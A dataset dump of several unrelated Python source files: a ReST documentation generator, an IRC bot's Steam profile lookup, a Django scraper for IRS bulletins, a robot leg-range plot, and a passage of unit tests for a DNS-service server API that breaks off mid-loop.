__id__
int64 17.2B
19,722B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
133
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 3
values | repo_name
stringlengths 7
73
| repo_url
stringlengths 26
92
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 12
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 61.3k
283M
⌀ | star_events_count
int64 0
47
| fork_events_count
int64 0
15
| gha_license_id
stringclasses 5
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
5.76M
⌀ | gha_stargazers_count
int32 0
82
⌀ | gha_forks_count
int32 0
25
⌀ | gha_open_issues_count
int32 0
80
⌀ | gha_language
stringclasses 5
values | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 19
187k
| src_encoding
stringclasses 4
values | language
stringclasses 1
value | is_vendor
bool 1
class | is_generated
bool 1
class | year
int64 2k
2.01k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1,881,195,680,599 |
f4a2f42eb85a115b6d32e35099ffdf5e8f037452
|
4af1479efae0d6f9a1e2ab911c1ff2d2200b9037
|
/scripts/docs.py
|
f4dfd08b5f92525bbc007b41c5ec19f78a44d3bb
|
[] |
no_license
|
PPinfor/JMTK
|
https://github.com/PPinfor/JMTK
|
bdd3f688c3d7fb65c361737475c9e9d81614d736
|
52f7690215569b3cc52b08aae9749529370b16e0
|
refs/heads/master
| 2017-12-14T09:24:12.201770 | 2013-06-13T18:38:28 | 2013-06-13T18:38:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# This script takes a "layout.graph" file and produces ReST documents for all
# chapters found within, along with an index.rst.
import sys,os,re,tempfile,subprocess, shutil
# A Source File is parsed into a sequence of fragments (of class SourceFragment).
class SourceFile:
    """One input source file, destructively parsed into SourceFragments.

    Two docstring syntaxes are recognised: C-style '/** ... */' block
    comments, and assembly-style runs of ';;;' line comments.
    """
    def __init__(self, name):
        self.name = name
        # Whole file buffered up front; the parser consumes self.lines
        # front-to-back, popping lines as it goes.
        self.lines = open(self.name).readlines()
        # Current 1-based line number of the parse position.
        self.linenum = 1
    def _is_asm_type(self, line):
        # ';;;' marks an assembly-style docstring line.
        if re.match(r'\s*;;;',line):
            return True
        return False
    def _doc_fragment(self):
        """Consume one docstring (plus any code it attaches) and return it
        as a SourceFragment."""
        docstr = []
        is_asm = self._is_asm_type(self.lines[0])
        while self.lines:
            line = self.lines.pop(0)
            if is_asm and not re.match(r'\s*;;;', line):
                # First non-';;;' line ends an asm docstring; push it back
                # so _src()/the next fragment sees it.
                self.lines.insert(0, line)
                break
            elif not is_asm and re.search(r'(^|[^*])\*?\*/', line):
                # '*/' terminates a C docstring; keep only the text before it.
                self.linenum += 1
                docstr.append(
                    line[:line.find('*/')] )
                break
            docstr.append(line)
        src = ''
        # A trailing '{file,"from","to"}' directive on the last docstring
        # line embeds code copied from another file; a bare '{' attaches
        # the code that follows, up to the next docstring.  '@}' escapes
        # the embed syntax and is left alone.
        if docstr[-1].find('}') != -1 and docstr[-1].find('@}') == -1:
            src = self._embed_src(docstr[-1])
            docstr[-1] = re.sub(r'{.*}', '' ,docstr[-1])
        elif docstr[-1].find('{') != -1:
            src = self._src()
            docstr[-1] = re.sub(r'{', '', docstr[-1])
        return SourceFragment(self, ''.join(docstr), src, self.linenum)
    def _src(self):
        """Consume and return raw source lines up to the next docstring."""
        src = []
        while self.lines:
            line = self.lines.pop(0)
            if self._is_docstring(line):
                # Push the docstring opener back for the next fragment.
                self.lines.insert(0, line)
                break
            self.linenum += 1
            src.append(line)
        return ''.join(src)
    def _embed_src(self, line):
        """Handle a '{file,"from","to"}' embed directive.

        Returns the lines of *file* from the first line containing the
        "from" marker up to and including the first subsequent line
        containing the "to" marker.
        """
        m = re.search(r'{(.*),"(.*)","(.*)"}', line)
        assert m
        file = m.group(1)
        search_from = m.group(2)
        search_to = m.group(3)
        if not search_to:
            # Empty end marker means "copy to end of file": use a needle
            # that will never match.
            search_to = 'I AM A STRING THAT WILL NOT BE FOUND ANYWHERE'
        ls = open(file, 'r').readlines()
        srcls = []
        state = 'skipping'
        for l in ls:
            if state == 'skipping' and l.find(search_from) != -1:
                state = 'adding'
            if l.find(search_to) != -1:
                state = 'done'
            if state != 'skipping':
                srcls.append(l)
            if state == 'done':
                break
        return ''.join(srcls)
    def _is_docstring(self, line):
        # '/**' (but not '/***', which the [^*] excludes) or ';;;' opens a
        # docstring.
        if re.match(r'\s*/\*\*($|[^*])', line) or \
           re.match(r'\s*;;;',line):
            return True
        return False
    def fragments(self):
        """Return the (cached) list of SourceFragments for this file."""
        return self._fragments()
    def has_documentation(self):
        """True if at least one fragment carries a docstring."""
        for frag in self.fragments():
            if frag.docstring:
                return True
        return False
    def _fragments(self):
        # Parse once and memoise; self.lines is consumed in the process.
        if hasattr(self, 'frags'):
            return self.frags
        frags = []
        while self.lines:
            line = self.lines[0]
            # A docstring containing '#cut' stops parsing the rest of the file.
            if self._is_docstring(line) and line.find('#cut') != -1:
                break
            if self._is_docstring(line):
                frag = self._doc_fragment()
            else:
                frag = SourceFragment(self, None, self._src(), self.linenum)
            frags.append(frag)
        self.frags = frags
        return frags
# A source fragment is a chunk of (optional) documentation and (optional) code.
class SourceFragment:
    """A chunk of (optional) documentation paired with (optional) code.

    The first docstring line may carry an explicit ordering marker of the
    form '#<n>'; it is stripped from the text and exposed as self.ord.
    """
    def __init__(self, file, docstring, src, linenum):
        self.file = file
        self.docstring = docstring
        self.src = src
        self.ord = None  # explicit '#<n>' ordering index, if present
        self.linenum = linenum
        if self.docstring:
            # '#12' on the first line is an ordering directive, not prose:
            # record it and remove the first occurrence from the text.
            firstline = self.docstring.split('\n')[0]
            match = re.search(r'#(\d+)', firstline)
            if match:
                self.ord = int(match.group(1))
                self.docstring = re.sub(r'#\d+', '', self.docstring, 1)
        # Drop a dangling '*' left over from a '*/' comment terminator.
        if self.docstring and re.search(r'\*\s*$', self.docstring):
            self.docstring = re.sub(r'\*\s*$', '', self.docstring)
    def __str__(self):
        ds = self.docstring if self.docstring else ''
        src = self.src if self.src else ''
        return "%s... (%s...)" % (ds[:16], src[:16])
    def _strip_prefix(self, ds):
        """Strip the common comment prefix (';', '/', '*', whitespace)
        from every line of docstring *ds*."""
        def _is_whitespace(l):
            return re.match(r'\s*$', l)
        if ds.startswith('/**'):
            ds = ' ' + ds[3:]
        lines = ds.split('\n')
        ls = [len(re.match(r'[;/*\s]*', l).group(0))
              for l in lines
              if not _is_whitespace(l)]
        # BUG FIX: a docstring consisting only of whitespace lines used to
        # crash min() with an empty sequence; treat that as "no prefix".
        l = min(ls) if ls else 0
        lines = [line[l:] for line in lines]
        return '\n'.join(lines)
    def raw_docstring(self):
        """Return the docstring with comment decoration removed ('' if none)."""
        if not self.docstring:
            return ''
        return self._strip_prefix(self.docstring)
# A chapter comes from one or more source files, and will organise the fragments
# from each into a sensible order.
class DocumentChapter:
    """One output chapter, built from the fragments of several source files
    and rendered to ReST, plus a predecessor/successor SVG graph."""
    def __init__(self, files, node, bdir):
        source_files = [SourceFile(f) for f in files]
        source_fragments = []
        for sf in source_files:
            # Files with no docstrings at all contribute nothing.
            if sf.has_documentation():
                source_fragments.extend(sf.fragments())
        source_fragments = self._reorder_fragments(source_fragments)
        self.node = node
        preds = list(self._get_preds())
        succs = list(self._get_succs())
        self.rest = self._make_rest(source_fragments)
        # Render the chapter-navigation graph next to the ReST output.
        graph_name = str(node).replace(' ', '-') + '.svg'
        self._render_pred_succ_graph(preds, succs, os.path.join(bdir, graph_name))
    def _make_rest(self, fragments):
        """Render *fragments* to a single ReST document string."""
        def indentlines(ls, n):
            return [' '*n + l for l in ls]
        def html(x):
            # Wrap raw HTML in a '.. raw:: html' directive block.
            return ['', '.. raw:: html', ''] + indentlines(x.splitlines(), 4) + [' ']
        out = []
        lastfile = ''
        for frag in fragments:
            if frag.src:
                attrs = []
                # Mark the first code block taken from each file.
                if lastfile != frag.file.name:
                    attrs = [":first_of_file:"]
                    lastfile = frag.file.name
                attrs.append(':anchor:')
                out += ['.. coderef:: %s' % frag.file.name] + indentlines(attrs, 4)
                out += ['']
                out += indentlines(frag.src.splitlines(), 4) + ['']
            if frag.docstring:
                out += frag.raw_docstring().splitlines()
                # Navigation anchor after each documentation chunk.
                out += html('<div class="anchor"></div>')
        return '\n'.join(out)
    def __str__(self):
        return self.rest
    def _get_preds(self):
        """Set of graph nodes with an edge into self.node (self excluded)."""
        if not self.node:
            return set()
        preds = set()
        for e in self.node.graph.edges:
            if e[1] == self.node:
                preds.add(e[0])
        if self.node in preds:
            preds.remove(self.node)
        return preds
    def _get_succs(self):
        """Set of graph nodes with an edge out of self.node (self excluded)."""
        if not self.node:
            return set()
        succs = set()
        for e in self.node.graph.edges:
            if e[0] == self.node:
                succs.add(e[1])
        if self.node in succs:
            succs.remove(self.node)
        return succs
    def _reorder_fragments(self, frags):
        """Bucket fragments by their explicit '#n' ordinal and concatenate
        the buckets in ascending order.

        Fragments without an ordinal inherit the most recent one seen, so
        they stay behind the fragment that set it.
        """
        ords = {}
        this_ord = 0
        max_ord = 0
        for frag in frags:
            if frag.ord:
                this_ord = frag.ord
                max_ord = max(max_ord, this_ord)
            if this_ord not in ords:
                ords[this_ord] = []
            ords[this_ord].append(frag)
        out = []
        for i in range(0, max_ord+1):
            if i in ords:
                out.extend(ords[i])
        return out
    def _render_pred_succ_graph(self, preds, succs, outf):
        """Render a small left-to-right pred -> node -> succ graph to the
        SVG file *outf* using graphviz 'dot'."""
        def url(node):
            return "./" + node.value.replace(' ', '-').lower() + '.html'
        dot = ['digraph G {', 'node [shape=box fontsize=12 fontname="Droid Sans" peripheries=0 ]', 'rankdir=LR; nodesep=0.0; pad="0,0";']
        dot += ['"%s" -> "%s"' % (p, self.node) for p in preds]
        dot += ['"%s" -> "%s"' % (self.node, s) for s in succs]
        # Each neighbour links to its own chapter page.
        dot += ['"%s" [href="%s" target="_parent"]' % (p, url(p)) for p in preds]
        dot += ['"%s" [href="%s" target="_parent"]' % (s, url(s)) for s in succs]
        dot += ['}', '']
        dot = '\n'.join(dot)
        # Write the dot source to a temp file, render, then clean up.
        tf = tempfile.NamedTemporaryFile(delete=False)
        tf.write(dot)
        tf.close()
        subprocess.check_call(['dot', '-s34', '-Tsvg', '-o', outf, tf.name])
        os.unlink(tf.name)
def _make_index_rst(g):
vs = []
for node in g.nodes.values():
vs.append(' ' + node.value.lower().replace(' ', '-'))
return """
JMTK docs
=========
Contents:
.. tocgraph::
x
.. toctree::
:maxdepth: 2
%s
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
""" % ('\n'.join(vs),)
if __name__ == '__main__':
from optparse import OptionParser
from graph import Graph
parser = OptionParser()
parser.add_option("--template", dest="template")
parser.add_option("--graph", dest="graph")
parser.add_option("--output-dir", dest="out_dir")
options, args = parser.parse_args()
if not options.out_dir:
options.out_dir = '.'
if not options.graph:
chapter = DocumentChapter(options.template, args, None, options.out_dir)
print str(chapter)
sys.exit(0)
try:
os.makedirs(options.out_dir)
except:
pass
g = Graph(options.graph)
for node in g.nodes.values():
print "DOC %s (from %s)" % (node.value, ', '.join(node.files))
chapter = DocumentChapter(node.files, node, options.out_dir)
outfilename = "%s/%s.rst" % (options.out_dir,
node.value.lower().replace(' ', '-'))
open(outfilename, 'w').write(str(chapter))
shutil.copy("doc/index.rst", "%s/index.rst" % options.out_dir)
# open("%s/index.rst" % options.out_dir, "w").write(_make_index_rst(g))
|
UTF-8
|
Python
| false | false | 2,013 |
1,563,368,139,424 |
f189c3533756e056bf0567a976432c5bcc86cd06
|
b37b84d1cc876cf4be3ae235d938a82e3f41e7c2
|
/modules/steam.py
|
17550ddbc7c50e2f5114b586883758713883b804
|
[
"EFL-2.0"
] |
permissive
|
kris545545/Code
|
https://github.com/kris545545/Code
|
fc65386c8dad7d903858307f3f22ed35dd8cab6e
|
7045f03deb172d1ef874a805c44569440030500a
|
refs/heads/master
| 2017-04-21T01:24:58.313955 | 2014-12-22T00:21:27 | 2014-12-22T00:21:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from util import web
import re
from util.hook import *
# Matches a Steam community profile URL; group(1) is the vanity name or id.
userid_re = r'.*(?:steamcommunity.com|www.steamcommunity.com)/(?:profiles|id)/([-_a-zA-Z0-9]+)/?.*'
# Matches a store/community/steamdb app URL; group(1) is the numeric app id.
appid_re = r'.*(?:store.steampowered.com|steamcommunity.com|steamdb.info)/app/([0-9]+)/?.*'
# Most of this file is done by manually parsing to get around having to use API keys, and as such,
# steamdb is unlikely to change their html tables much
@hook(cmds=['steam'], args=True)
def steam_user(code, input):
    """ steam <id> -- find user information and worth of a Steam account/username """
    # Explicit command: the second match group holds the requested id.
    requested_id = input.group(2)
    user_lookup(code, requested_id)
@hook(rule=userid_re)
def steam_user_auto(code, input):
    # Passive URL match: stay silent in-channel if the lookup fails.
    profile_id = input.group(1)
    user_lookup(code, profile_id, showerror=False)
def user_lookup(code, id, showerror=True):
    """Look up a Steam account on steamdb.info and report name/status/worth.

    id        -- community profile id or vanity name
    showerror -- when False (passive URL matches) stay quiet on failure
    """
    try:
        # BUG FIX: '&currency=us' had been mangled into '\xa4cy=us' ('&curren'
        # collapsed into the HTML currency-sign entity), corrupting the query.
        data = web.text('http://steamdb.info/calculator/?player={id}&currency=us'.format(id=id), timeout=10)
        if 'This profile is private, unable to retrieve owned games.' in data:
            if showerror:
                # BUG FIX: 'Unabled' typo in the user-facing message.
                code.say('{b}Unable to retrieve info, that account is {red}private{c}!')
            return
        realname = re.search(r'<title>(?P<name>.*?) \xb7 .*?</title>', data).group('name')
        status = re.search(
            r'<td class="span2">Status</td>.*?<td>(?P<status>.*?)</td>', data).group('status')
        # Basic user information: strip the BBCode/HTML list markup down to
        # '{b}'-formatted plain text.
        details = data.split('[list]')[1].split('[/list]')[0]
        details = re.sub(r'\<\/.*?\>', '', details)
        details = re.sub(r'\<.*?\>', ' {b}- ', details)
        details = re.sub(r'\[.*?\]', '', details)
        details = details.replace(': ', ': {b}')
        url = 'http://steamcommunity.com/id/' + id
        return code.say('{b}%s{b} - {green}%s{c} - %s - %s' % (web.escape(realname), status, details, url))
    except Exception:
        # Deliberately broad: any scrape/parse hiccup is reported as
        # "not found" (narrowed from a bare except so ^C still works).
        if showerror:
            code.say('{b}Unable to find user information on %s!' % id)
        return
@hook(rule=appid_re)
def steam_app_auto(code, input):
    # Passive app-URL hook: returns a '{b}'-formatted one-line summary of
    # the app (name, rating, release state, OS list, price) scraped from
    # steamdb.info.
    try:
        data = web.text('http://steamdb.info/app/%s/' % web.quote(input.group(1)), timeout=10)
        output = []
        output.append(
            re.findall(r'<td>Name</td><td itemprop="name">(.*?)</td>', data)[0])  # Name
        # Metacritic Score
        score = re.findall(r'metacritic_score</td><td>(.*?)</td>', data)
        if len(score) < 1:
            score = '{b}N/A{b}'
        else:
            score = score[0]
        output.append('Rating: %s/100' % score)
        # Released yet?
        if '<td class="span3">releasestate</td><td>prerelease</td>' in data:
            output.append('{blue}Prerelease{c}')
        # OS List
        if '<td class="span3">oslist</td>' in data:
            tmp = re.findall(
                r'<tr><td class="span3">oslist</td><td>(.*?)</td></tr>', data)[0]
            # OS names live in the icons' title="..." attributes.
            tmp = re.findall(r'title="(.*?)"', tmp)
            output.append('OS: ' + ', '.join(tmp))
        else:
            output.append('OS: N/A')
        # With pricing, there are a few options...
        # 1. Free, 2. Cost, 3. Cost with discount
        # As well, 1. Not released (May cause issues with rendering the price
        # table) or 2. released
        if 'isfreeapp</td><td>Yes</td>' in data:
            # We know it's free!
            output.append('{green}Free{c}')
        elif '<table class="table table-prices">' in data:
            # First cell of the price table holds the US price.
            tmp = re.findall(
                r'<table class="table table-prices">.*?<tbody><tr>(.*?)</tr></tbody>', data)[0]
            tmp = tmp.replace('<td>', '').split('</td>', 1)[0]
            # We know it's paid... now check if discounted..
            if 'price-discount' in tmp:
                # We know it's discounted
                initial = tmp.split(
                    'class="price-initial">', 1)[1].split('</span>', 1)[0]
                new = tmp.split('</span>', 1)[1].split('<', 1)[0]
                discount = tmp.split(
                    '"price-discount">', 1)[1].split('<', 1)[0]
                output.append('{green}%s{c} (%s, was %s)' %
                              (new, discount, initial))
            else:
                output.append('{green}' + tmp)
        output.append('http://store.steampowered.com/app/%s/' %
                      re.findall(r'<td class="span3">App ID</td><td>(.*?)</td>', data)[0])
        # if else, it's unknown, so ignore it. Likely an issues with release
        # pricing.
        return str(' - {b}'.join(output).replace(': ', ': {b}'))
    except:
        # NOTE(review): bare except silently drops any scrape failure --
        # deliberate for a passive hook, but it also hides real bugs.
        return
|
UTF-8
|
Python
| false | false | 2,014 |
678,604,853,053 |
06a629d79b846a0e6c44daf41fe02e7a6bb6f5e7
|
bffbacdfae26435e2fc409c880a4ed86e2eff94c
|
/plugins/management/commands/load_irb.py
|
99117f2728fcec44e26690666707db95e43cc3a5
|
[] |
no_license
|
aih/USLAW
|
https://github.com/aih/USLAW
|
f991ea09d28443dc7343cf9d48d527695131cfa2
|
c30c5dfcd3b0a9d9b9a0a826f9387d6a45e263da
|
refs/heads/master
| 2021-05-27T16:08:46.429251 | 2013-10-29T20:20:00 | 2013-10-29T20:20:00 | 9,488,371 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
# Uslaw Project
try:
import re2 as re
except ImportError:
import re
from datetime import datetime
from time import strptime, mktime
import sys
import traceback
from pyquery import PyQuery as pq
from urlparse import urljoin
from django.core.management.base import BaseCommand
from django.conf import settings
from utils.shorturl import bitly_short
from utils.load_url import load_url
from utils.txt2html import texttohtml
from laws.models import InternalRevenueBulletinToc, InternalRevenueBulletin
from parserefs.autoparser import parse
from plugins.plugin_base import BasePlugin
from plugins.models import Plugin
from laws.views import target_to_section
from log.models import addlog
_PLUGIN_ID = 11
class Command(BaseCommand, BasePlugin):
help = """Load and parse IRM from http://www.irs.gov/irm/"""
sender = "IRB parser"
def process_page(self, page):
"""
Extract regulations links from page and process page
"""
_BASE_URL = "http://www.irs.gov"
new_urls = []
if settings.DEBUG:
print "Processing: %s" % page.url
print "level: %s" % page.plugin_level
data = page.page
if page.plugin_level == 0:
# at this level we just exctract links to Parts of IRB
new_urls = []
d = pq(data)
items = d.items('tr')
new_urls = []
for i in items:
#print i
html_href = i('td:first a:first').attr('href')
pdf_href = i('td:first a:last').attr('href')
if not html_href:
continue
url = "%s%s" % (_BASE_URL, html_href)
pdf_url = "%s%s" % (_BASE_URL, pdf_href)
new_urls.append([url, 1])
#new_urls.append([pdf_url, 5])
pub_date = i('td:last').text()
pub_date = strptime(pub_date, "%B %d, %Y")
pub_date = datetime.fromtimestamp(mktime(pub_date))
try:
irbtoc = InternalRevenueBulletinToc.objects.get(source_link=url)
except InternalRevenueBulletinToc.DoesNotExist:
irbtoc = InternalRevenueBulletinToc(source_link=url,
pdf_link=pdf_url,
level=0, name="",
order_id=0,
current_through=pub_date,
element_type=0)
irbtoc.save()
page.status = 1
page.save()
if page.plugin_level == 1:
# sub pages with toc
#data = data.replace(" ", " ").replace(u' ', ' ')
top_irb_toc = InternalRevenueBulletinToc.objects.get(source_link=page.url)
d = pq(data)
title = d('h3:first').text().replace(u' ', ' ')
title = ' '.join(title.split())
top_irb_toc.name = title
top_irb_toc.save()
print title
items = d.items('li')
part_id = 0
sub_part_id = 0
for i in items:
#print i.html()
#print "====" * 20
href = i('a:first').attr('href')
name = i('a:first').text().strip()
name = ' '.join(name.split())
url = urljoin(page.url, href)
print "%s -> %s" % (name, url)
if href.startswith('pt'): # new toc item
part_id += 1
irb_toc, c = InternalRevenueBulletinToc.objects.get_or_create(source_link=url,
parent=top_irb_toc,
name=name,
level=1, element_type=0)
irb_toc.order_id = part_id
irb_toc.save()
#print "New irb toc: %s" % irb_toc
#new_urls.append([url, 2]) # FIXMEE
elif href.startswith('ar') and not "#" in href: # level=2
part_id += 1
#url = urljoin(page.url, href)
sub_irb_toc, c = InternalRevenueBulletinToc.objects.get_or_create(source_link=url,
parent=irb_toc,
name=name,
level=2, element_type=1)
sub_irb_toc.order_id = part_id
sub_irb_toc.save()
#print "New sub irb toc: %s" % sub_irb_toc
new_urls.append([url, 2])
else:
if "#" not in href:
raise "Weird link, please fixme"
#if "<ul" in i.html():
# print "%" * 44
# print i.html()
# print "$" * 44
sub_part_id += 1
#url = urljoin(page.url, href)
section_id = href.split('#')[1]
sub_sub_irb_toc, c = InternalRevenueBulletinToc.objects.get_or_create(source_link=url,
parent=sub_irb_toc,
name=name,
section_id=section_id,
element_type=2)
if c:
sub_sub_irb_toc.level = 3
sub_sub_irb_toc.order_id = sub_part_id
sub_sub_irb_toc.save()
#print "New sub sub irb toc: %s" % sub_sub_irb_toc
#new_urls.append([url, 2])
check_subitems = i.items('ul li')
if "<ul" in i.html():
#print i.html()
#print ">>>" * 33
#print i.items('ul li')
for ch in check_subitems:
#print "ELEMENT:", ch.html()
#print "-" * 30
#print "-" * 30
shref = ch('a:first').attr('href')
sname = ch('a:first').text().strip()
sname = ' '.join(sname.split())
surl = urljoin(page.url, shref)
sub_part_id += 1
section_id = shref.split('#')[1]
sub_sub_irb_toc, c = InternalRevenueBulletinToc.objects.get_or_create(source_link=surl,
parent=sub_irb_toc,
name=sname,
section_id=section_id,
element_type=2)
sub_sub_irb_toc.order_id = sub_part_id
sub_sub_irb_toc.level = 4
sub_sub_irb_toc.save()
print "New sub sub irb toc: %s, LEVEL: 4" % sub_sub_irb_toc
if page.plugin_level == 2:
print "Level 2: %s" % page.url
top_irb_toc = InternalRevenueBulletinToc.objects.get(source_link=page.url)
data = data.replace('<div></div>', '') # PyQuery bug
fname = page.url.split('/')[-1].split('#')[0].split('?')[0]
data = data.replace(fname, '') # remove filename from html
top_i = top_irb_toc.parent
while top_i.parent is not None:
top_i = top_i.parent
def link_repl(mobj):
print mobj.group(1)
return "<a href='/laws/irb-redirect/?toc=%s§=%s'>" % (top_i.pk,
mobj.group(1))
data = re.sub(r'<a href="(\w+)(.*?)">', link_repl, data)
d = pq(data)
part_id = 0
subtitle = d('h3.subtitle:first').html()
irb_item = InternalRevenueBulletin.objects.get_or_create(text=subtitle,
toc=top_irb_toc,
part_id=part_id)
article = d('div.article:first').html()
part_id += 1
anchor_re = re.compile(r'<a name="(\w+)">')
for item in d.items('div.sect1'):
part_id += 1
text = item.html()
try:
anchor = anchor_re.findall(text)[0]
except IndexError:
print "Can;t found section id"
section_id = ""
sub_irb_toc = None
else:
sub_irb_toc = InternalRevenueBulletinToc.objects.get(section_id=section_id,
parent=top_irb_toc)
print "NEWDOC:", top_irb_toc.pk
irb_item = InternalRevenueBulletin.objects.get_or_create(text=article,
toc=top_irb_toc,
part_id=part_id, sub_toc=sub_irb_toc)
footnote = d('div.footnote').html()
if footnote:
part_id += 1
irb_item = InternalRevenueBulletin.objects.get_or_create(text=footnote,
toc=top_irb_toc,
part_id=part_id)
#page.status = 1
#page.save()
#print new_urls
return new_urls
def handle(self, *args, **options):
_START_URLS = ["http://www.irs.gov/irb/",]
self.run(_START_URLS, _PLUGIN_ID)
|
UTF-8
|
Python
| false | false | 2,013 |
2,869,038,183,554 |
11df9bf424deb237ecf9488fda8211cc89eeeaaf
|
ee0ac47ec7d920f347b7b8900eba8344700e76bf
|
/Plot/Plot_LegRange.py
|
c2ad3cf452bb201de23e0e842adf27b366120cf6
|
[] |
no_license
|
Pieter-Jan/Thesis
|
https://github.com/Pieter-Jan/Thesis
|
bef6149439659060e277b7e26147489e30e1bae5
|
32dc2af2c263a35715f78b3f47212533f57a000c
|
refs/heads/master
| 2021-01-22T02:04:48.761973 | 2014-03-20T12:35:40 | 2014-03-20T12:35:40 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Plot the reachable foot-position range of an Oncilla leg by sweeping the
# servo joint angles (alpha, beta, gamma) over their limits.
import matplotlib.pyplot as plt
import numpy
import math
import sys
# The Oncilla kinematics modules live one directory up.
sys.path.append('../Oncilla')
import OncillaKinematics as OK
import ikm as OK2  # NOTE(review): OK2 is never used in this script
# Joint limits from the kinematics model; q_limits rows are [min, max],
# columns (alpha, beta, gamma).
alphamin = OK.q_limits[0, 0]
alphamax = OK.q_limits[1, 0]
betamin = OK.q_limits[0, 1]
betamax = OK.q_limits[1, 1]
gammamin = OK.q_limits[0, 2]
gammamax = OK.q_limits[1, 2]
# Initial joint angles in radians.
alpha = 0.0*math.pi/180.0
beta = 135.0*math.pi/180.0
gamma = 90.0*math.pi/180.0
f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
plt.gca().invert_yaxis()  # flip Y -- presumably so Y grows downwards; confirm
# Sweep alpha/beta over their full range at fixed gamma and plot the
# reachable foot positions of leg 1 in the X-Y plane.
for alpha in numpy.arange(alphamin, alphamax, 0.01):
    for beta in numpy.arange(betamin, betamax, 0.01):
        X = OK.FootPositions_FromServo(alpha, beta, gamma, 1)
        ax1.plot(X[1,0], X[0,0], 'ko')
ax1.set_xlabel('X')
ax1.set_ylabel('Y')
ax1.set_title('gamma = 0.0')  # NOTE(review): gamma is 90 deg here -- label looks stale; confirm
# Sweep gamma/beta at fixed alpha and plot the Z-Y plane.
alpha = 0.0*math.pi/180.0
for gamma in numpy.arange(gammamin, gammamax, 0.0005):
    for beta in numpy.arange(betamin, betamax, 0.01):
        X = OK.FootPositions_FromServo(alpha, beta, gamma, 1)
        ax2.plot(X[2,0], X[0,0], 'ko')
ax2.set_xlabel('Z')
ax2.set_ylabel('Y')
ax2.set_title('alpha = 0.0')
plt.show()
|
UTF-8
|
Python
| false | false | 2,014 |
8,804,682,993,880 |
d53cfed937700d26ca9464113c2a235062a48ead
|
437da34eec1321c86f9d42d0089304d6a650a3be
|
/test_server.py
|
8ce041ef11cf86955d0ddb6c88be398d5f4d8f30
|
[] |
no_license
|
MerlinGuy/ut_dnsaas
|
https://github.com/MerlinGuy/ut_dnsaas
|
5bf7c049a0ae597db1931bffecfbbaaf9ba22ba3
|
8a76537ce5847f28dc5351a9b41c164c09814b70
|
refs/heads/master
| 2016-09-10T15:35:50.229477 | 2014-10-24T19:26:41 | 2014-10-24T19:26:41 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__author__ = 'jeff'
from utils import *
import unittest
import os
from cfg import *
class TestServer(unittest.TestCase):
    """CRUD tests for the Designate 'server' resource.

    Admin credentials may create/update/delete servers; tenant credentials
    (USER1) must be rejected with Forbidden.  Several tests "succeed by
    failure": the expected exception is caught and the test simply ends.
    """
    dtu = None        # DesignateUtil helper, rebuilt per test in setUp()
    verbose = False

    def setUp(self):
        # NOTE(review): os.getenv returns a *string* whenever the variable
        # is set, so any value (even '0') makes verbose truthy -- confirm.
        self.verbose = os.getenv('TEST_VERBOSE', False)
        self.dtu = DesignateUtil(ADMIN_USER)

    def tearDown(self):
        # Remove everything the test created.
        self.dtu.clean_up()

    """ Create Tests """
    def test_create_server(self):
        """Create a valid server and check it exists"""
        try:
            sapi = self.dtu.get_server_api(ADMIN_USER)
            server = self.dtu.create_server(sapi, '')
            sapi.get({'id': server['id']})
        except NotFound:
            self.fail('Failed to create server')

    def test_create_server_dup(self):
        """Create a duplicate server - expect failure"""
        try:
            sapi = self.dtu.get_server_api(ADMIN_USER)
            server = self.dtu.create_server(sapi, '')
            sapi.create({'name': server['name']})
            # BUG FIX: 'server' is a dict (indexed server['id'] above);
            # server.name raised AttributeError and masked the real message.
            self.fail('Failed - Server with duplicated name created %s ' % server['name'])
        except Conflict:
            """ Success by failure """

    def test_create_server_badcred(self):
        """Create a server using tenant credentials - expect failure"""
        try:
            sapi = self.dtu.get_server_api(USER1)
            self.dtu.create_server(sapi, '')
            self.fail('Failed - Server created with bad credentials')
        except Forbidden:
            """ Success by failure """

    """ Update Tests """
    def test_update_server(self):
        """Update a server using admin credentials"""
        try:
            sapi = self.dtu.get_server_api(ADMIN_USER)
            server1 = self.dtu.create_server(sapi, '')
            new_name = self.dtu.get_unique_name(8, ".test.com.")
            options = {
                'id': server1['id'],
                'data_json': {'name': new_name}
            }
            sapi.update(options)
            server2 = sapi.get({'id': server1['id']})
            self.assertEqual(new_name, server2['name'], "Server update failed")
        except KeyError:
            self.fail('Failed to create Server')

    def test_update_server_major_fail(self):
        """Rename a server to another server's name - expect Conflict"""
        try:
            sapi = self.dtu.get_server_api(ADMIN_USER)
            server1 = self.dtu.create_server(sapi, '')
            sapi2 = self.dtu.get_server_api(ADMIN_USER)
            server2 = self.dtu.create_server(sapi2, '')
            options = {
                'id': server2['id'],
                'data_json': {'name': server1['name']}
            }
            sapi.update(options)
            self.fail("System allowed two servers to have the same name")
        except Conflict:
            """ Success by Failure """

    def test_update_server_badcred(self):
        """Update a server using tenant credentials - expect failure"""
        try:
            sapi = self.dtu.get_server_api(ADMIN_USER)
            server1 = self.dtu.create_server(sapi, '')
            sapi2 = self.dtu.get_server_api(USER1)
            options = {
                'id': server1['id'],
                'data_json': {'name': self.dtu.get_unique_name(8, ".test.com.")}
            }
            sapi2.update(options)
            self.fail("System allowed server update by non-admin")
        except Forbidden:
            """ Success by Failure """

    """ List Tests """
    def test_list_servers(self):
        """Get list of current servers"""
        sapi = self.dtu.get_server_api(ADMIN_USER)
        sids = []
        for x in xrange(3):
